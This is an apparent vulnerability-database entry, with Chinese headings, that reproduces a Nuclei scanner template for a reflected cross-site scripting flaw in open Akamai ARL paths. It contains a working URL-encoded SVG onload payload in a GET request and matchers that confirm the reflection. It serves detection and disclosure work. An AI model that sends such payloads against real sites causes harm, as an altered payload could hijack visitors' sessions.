akamai-arl-xss: Open Akamai ARL - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: akamai arl xss | POC: 已公开

漏洞描述

Open Akamai ARL contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.

PoC代码[已公开]

id: akamai-arl-xss

info:
  name: Open Akamai ARL - Cross-Site Scripting
  author: pdteam
  severity: high
  description: Open Akamai ARL contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  reference:
    - https://github.com/war-and-code/akamai-arl-hack
    - https://twitter.com/SpiderSec/status/1421176297548435459
    - https://warandcode.com/post/akamai-arl-hack/
    - https://github.com/cybercdh/goarl
    - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: akamai,xss,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"><svg onload=confirm(document.domain)>'
          - 'Suggestions for improving the results'

      - type: word
        part: header
        words:
          - 'text/html'
# digest: 4a0a00473045022054d0bbfdb730d8916d52180d769f31d37d745673f0b892165e15de772cb4a6df022100f8c96044b2817a6b3858263803285312b85ac1a1602b110c5da399105b5e2a10:922c64590222798bb761d5b6d8e72950